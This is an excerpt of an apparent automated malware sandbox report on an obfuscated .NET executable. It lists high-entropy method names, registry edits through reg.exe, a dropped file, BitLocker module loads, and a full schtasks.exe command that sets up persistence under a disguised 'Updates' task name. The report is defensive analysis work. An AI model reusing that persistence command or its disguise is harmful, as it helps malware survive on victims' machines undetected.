            Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, JZ2ny8fI1YmI7oWLrL.csHigh entropy of concatenated method names: 'ToString', 'y98DEl2lK1', 'tVQDpWCvKX', 'w8mDjMRDdQ', 'HKWDJWA09y', 'zSZDawp5ur', 'P4FD44sDHD', 'bXsDTsecTf', 'IusD3aKGkA', 'AecDrOVogl'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, IhRO8Tsw4lT9Fs7fuvm.csHigh entropy of concatenated method names: 'YOqn1fPqlW', 'IKUn8t9GfF', 'PinnohFcQY', 'E2AnejYVeD', 'mfZnlNYlMN', 'kC6n7ftKOh', 'uWhnOpU214', 'K5nnxKbrIH', 'aXnn9KYxVu', 'NO5nkIi5is'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, VkxmdCPh0dF91gyE8L.csHigh entropy of concatenated method names: 'mOEySM2xGm', 'TPAyuVgrBj', 'ABLyqEGCDa', 'kyOyCceOMu', 'qjky64rEgL', 'SpVqWd58EI', 'NGHqZRyulM', 'V23qdvYQuj', 'f4cqcFv4cA', 'VpQq2vvhb9'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, m7ehKDuvw5GaO3SAiB.csHigh entropy of concatenated method names: 'Dispose', 'aVcs2wccPR', 'D4qhp6FJrl', 'U67ffATqBq', 'QgRsHUbpUT', 'OCcsz64q02', 'ProcessDialogKey', 'UF2hwTijwf', 'u1UhsSfxTU', 'koqhhZF30a'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, L2K7nbzRb5MnTUOUu0.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SBLn5685OY', 'hPInibMbeK', 'jm2nDmclI1', 'NnunmLIZBE', 'W4anNXwWef', 'vNrnnAPvbH', 'IpnnFa23xN'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, ORUbpUcTECc64q02WF.csHigh entropy of concatenated method names: 'WqbNtu2PR9', 'bhqNuZMXqS', 'sesNYXO3cK', 'Fs8NqhZrPN', 'wd0NyjIJ3t', 'YVwNCeptVR', 'j4lN6S7dFj', 'P7rNBVduGP', 'AhxNbZh6nd', 'bV4NRJBMPA'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, Vfq87d0qyfa9UN0Y3r.csHigh entropy of concatenated method names: 's5f5xKkSPd', 'br559CEXyk', 'z3U5PFPKOe', 'u1D5pIB2jr', 'auw5JPKkIo', 'wSs5aVRLYq', 'xtO5Tj2Bj9', 'UPY53iY3vA', 'i8O5gdNeNO', 'cbi5EfJibe'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, R43ntJ9WlnGQu3XYW2.csHigh entropy of concatenated method names: 'MZVYeFbD63', 'rlWY7htTrA', 'ToJYxIMhc6', 'HX7Y9Exf17', 'ILqYieMTAf', 'H9oYDjTvY3', 'jthYmxTLuc', 'FWQYNSQ1J2', 'BbqYnqr4B1', 'x6qYFRhW47'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, ekiVxK6VuR4OQnevN0.csHigh entropy of concatenated method names: 'lx3LSQA9nb', 'kwQLtL1AZo', 'QBTLued96p', 'pbkLYoWOYn', 'GkSLqQpdGZ', 'MRsLyTZ6eF', 'cidLCkdyvt', 'KB1L6oy3mk', 'DykLB2RKK4', 'XiiLb0RwMO'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, COQHp4sLPuyvhXixHFc.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HvRFAvvRZN', 'd1uFI4KCEt', 'eM4Ffyhxvp', 'JnXFK2OUhw', 'uReFWBLJY0', 'yxJFZgrDqx', 'Lg7FdTFrdl'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, govCQSXA7pTF7U4miR.csHigh entropy of concatenated method names: 'kwQsCebBCG', 'b4cs6EidVq', 'IWlsbnGQu3', 'eYWsR2VUUk', 'kGqsiFZZkx', 'qdCsDh0dF9', 'X90vSAigQXuf48LRBn', 'bZxhrsDmkJgdnoaLOZ', 'IVwssZ4MdQ', 'sWksLWr7Xw'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, CNHbGRJjsbShBn9kCk.csHigh entropy of concatenated method names: 'qpsyVDsAcd', 'DQTy1wB96J', 'CZEyolmiVm', 'kCSye3SCHc', 'U3ty7wd5X0', 'CGPyOSkK8N', 'NAny9L5em2', 'zS8yk25419', 'NXOgAmurcV1XGxbqmhs', 'bRIjQvuL6oovgJppWVJ'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, XjaMkDreeAEx2QyBUh.csHigh entropy of concatenated method names: 'nhlC1u79iv', 'qIWC8JQmnG', 'nYFCo6bWNC', 'M2XCe52vyx', 'BfmClIJltB', 'JeiC73xqFF', 'oVyCOMP5Gw', 'F8aCxHCQYG', 'yncC9WAIoH', 'PBcCkVrYSm'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, FNDhjfKOXWnfEgrOxW.csHigh entropy of concatenated method names: 'uDHmbNb44c', 'vMOmRjl1jW', 'ToString', 'MFYmtcF7Ip', 'IgPmuYEV60', 'GLAmYcdF13', 'NMjmqKu43A', 'fEtmy2XSLN', 'JNDmCf4mm7', 'Y2bm6uJyW4'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, VF30aAHoJ8tYtu7HW4.csHigh entropy of concatenated method names: 'goGnsJISGS', 'dkXnLdrne1', 'zx3nXCoAag', 'qifntkA5KF', 'nqtnueJQdh', 'PRYnq6Dvlf', 'iplnyMgocv', 'jEbNdcFQFI', 'HvYNcrgEh4', 'q52N2i9CrN'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, picCfyhycqVC04P7lL.csHigh entropy of concatenated method names: 'ETVoNmy0E', 'YE2eacpgD', 'jSc75uJhr', 'LR4OUAKTW', 'ffc9u8HJl', 'jU6kgfxHp', 'JtKD8l6g7Ws4uldIaC', 'U9hcAhNp9IQNE8IAW6', 'Gk8NPtTtN', 'pTGFtHlYc'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, b19wuHZr1gri9Sh9ho.csHigh entropy of concatenated method names: 'pMemcD7mJ4', 'LsymHWQDfc', 'pYUNwQhhth', 'PmXNs9NHdy', 'iHdmEMLWGg', 'JlAmv3ZrGZ', 'zLIm0EUurf', 'iVemAcqJLH', 'DEkmIvc4Co', 'BhomfUnk2a'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, XTijwf2U1USfxTU6oq.csHigh entropy of concatenated method names: 'edJNPwZ0p2', 'hqxNpmHQ0j', 'WsdNjbO5Ip', 'w6dNJwvgQa', 'OWKNATmfdq', 'CITNaJeFgb', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, gjgmXoAXn4tWbfndxk.csHigh entropy of concatenated method names: 'sEGigaUykT', 'eOLivNltwa', 'op8iAkJDuw', 'qC1iIAg347', 'OtgipFkaBJ', 'oLLijURYrU', 'HrciJ2HKJ7', 'I6ViaB3nYO', 'qBRi4CS5ED', 'u5PiTKRZuc'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, webBCGxs4cEidVqfoA.csHigh entropy of concatenated method names: 'M5DuAgNgB7', 'uhvuIAmwrT', 'BDQufFxBGJ', 'Ha3uKg2eFf', 'HxTuW3lbUT', 'YAXuZsAqp2', 'oGBudNIyTX', 'S5cucniZ2y', 'h8Du2nJWj2', 'Hi1uHcMcOA'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, pfKX9pTyV9AHnv1emj.csHigh entropy of concatenated method names: 'OWdCtNiuv5', 'SOqCYwBnKO', 'd8xCyXLbOU', 'JNgyHGuydu', 'W09yzdVkZe', 'kO8CwsIiEm', 'cZfCs0UOLa', 'JScChP330W', 'WHaCLZkWTt', 'ASeCXUbgWp'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, JZ2ny8fI1YmI7oWLrL.csHigh entropy of concatenated method names: 'ToString', 'y98DEl2lK1', 'tVQDpWCvKX', 'w8mDjMRDdQ', 'HKWDJWA09y', 'zSZDawp5ur', 'P4FD44sDHD', 'bXsDTsecTf', 'IusD3aKGkA', 'AecDrOVogl'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, IhRO8Tsw4lT9Fs7fuvm.csHigh entropy of concatenated method names: 'YOqn1fPqlW', 'IKUn8t9GfF', 'PinnohFcQY', 'E2AnejYVeD', 'mfZnlNYlMN', 'kC6n7ftKOh', 'uWhnOpU214', 'K5nnxKbrIH', 'aXnn9KYxVu', 'NO5nkIi5is'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, VkxmdCPh0dF91gyE8L.csHigh entropy of concatenated method names: 'mOEySM2xGm', 'TPAyuVgrBj', 'ABLyqEGCDa', 'kyOyCceOMu', 'qjky64rEgL', 'SpVqWd58EI', 'NGHqZRyulM', 'V23qdvYQuj', 'f4cqcFv4cA', 'VpQq2vvhb9'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, m7ehKDuvw5GaO3SAiB.csHigh entropy of concatenated method names: 'Dispose', 'aVcs2wccPR', 'D4qhp6FJrl', 'U67ffATqBq', 'QgRsHUbpUT', 'OCcsz64q02', 'ProcessDialogKey', 'UF2hwTijwf', 'u1UhsSfxTU', 'koqhhZF30a'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, L2K7nbzRb5MnTUOUu0.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SBLn5685OY', 'hPInibMbeK', 'jm2nDmclI1', 'NnunmLIZBE', 'W4anNXwWef', 'vNrnnAPvbH', 'IpnnFa23xN'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, ORUbpUcTECc64q02WF.csHigh entropy of concatenated method names: 'WqbNtu2PR9', 'bhqNuZMXqS', 'sesNYXO3cK', 'Fs8NqhZrPN', 'wd0NyjIJ3t', 'YVwNCeptVR', 'j4lN6S7dFj', 'P7rNBVduGP', 'AhxNbZh6nd', 'bV4NRJBMPA'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, Vfq87d0qyfa9UN0Y3r.csHigh entropy of concatenated method names: 's5f5xKkSPd', 'br559CEXyk', 'z3U5PFPKOe', 'u1D5pIB2jr', 'auw5JPKkIo', 'wSs5aVRLYq', 'xtO5Tj2Bj9', 'UPY53iY3vA', 'i8O5gdNeNO', 'cbi5EfJibe'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, R43ntJ9WlnGQu3XYW2.csHigh entropy of concatenated method names: 'MZVYeFbD63', 'rlWY7htTrA', 'ToJYxIMhc6', 'HX7Y9Exf17', 'ILqYieMTAf', 'H9oYDjTvY3', 'jthYmxTLuc', 'FWQYNSQ1J2', 'BbqYnqr4B1', 'x6qYFRhW47'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, ekiVxK6VuR4OQnevN0.csHigh entropy of concatenated method names: 'lx3LSQA9nb', 'kwQLtL1AZo', 'QBTLued96p', 'pbkLYoWOYn', 'GkSLqQpdGZ', 'MRsLyTZ6eF', 'cidLCkdyvt', 'KB1L6oy3mk', 'DykLB2RKK4', 'XiiLb0RwMO'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, COQHp4sLPuyvhXixHFc.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HvRFAvvRZN', 'd1uFI4KCEt', 'eM4Ffyhxvp', 'JnXFK2OUhw', 'uReFWBLJY0', 'yxJFZgrDqx', 'Lg7FdTFrdl'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, govCQSXA7pTF7U4miR.csHigh entropy of concatenated method names: 'kwQsCebBCG', 'b4cs6EidVq', 'IWlsbnGQu3', 'eYWsR2VUUk', 'kGqsiFZZkx', 'qdCsDh0dF9', 'X90vSAigQXuf48LRBn', 'bZxhrsDmkJgdnoaLOZ', 'IVwssZ4MdQ', 'sWksLWr7Xw'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, CNHbGRJjsbShBn9kCk.csHigh entropy of concatenated method names: 'qpsyVDsAcd', 'DQTy1wB96J', 'CZEyolmiVm', 'kCSye3SCHc', 'U3ty7wd5X0', 'CGPyOSkK8N', 'NAny9L5em2', 'zS8yk25419', 'NXOgAmurcV1XGxbqmhs', 'bRIjQvuL6oovgJppWVJ'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, XjaMkDreeAEx2QyBUh.csHigh entropy of concatenated method names: 'nhlC1u79iv', 'qIWC8JQmnG', 'nYFCo6bWNC', 'M2XCe52vyx', 'BfmClIJltB', 'JeiC73xqFF', 'oVyCOMP5Gw', 'F8aCxHCQYG', 'yncC9WAIoH', 'PBcCkVrYSm'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, FNDhjfKOXWnfEgrOxW.csHigh entropy of concatenated method names: 'uDHmbNb44c', 'vMOmRjl1jW', 'ToString', 'MFYmtcF7Ip', 'IgPmuYEV60', 'GLAmYcdF13', 'NMjmqKu43A', 'fEtmy2XSLN', 'JNDmCf4mm7', 'Y2bm6uJyW4'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, VF30aAHoJ8tYtu7HW4.csHigh entropy of concatenated method names: 'goGnsJISGS', 'dkXnLdrne1', 'zx3nXCoAag', 'qifntkA5KF', 'nqtnueJQdh', 'PRYnq6Dvlf', 'iplnyMgocv', 'jEbNdcFQFI', 'HvYNcrgEh4', 'q52N2i9CrN'

            Persistence and Installation Behavior

            barindex
            Uses cmd line tools excessively to alter registry or file data
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeProcess created: reg.exe
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeProcess created: reg.exe
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeProcess created: reg.exe
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeProcess created: reg.exe
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeFile created: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeJump to dropped file

            Boot Survival

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AZJifQrhDpEQCA" /XML "C:\Users\user\AppData\Local\Temp\tmpB59F.tmp"

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
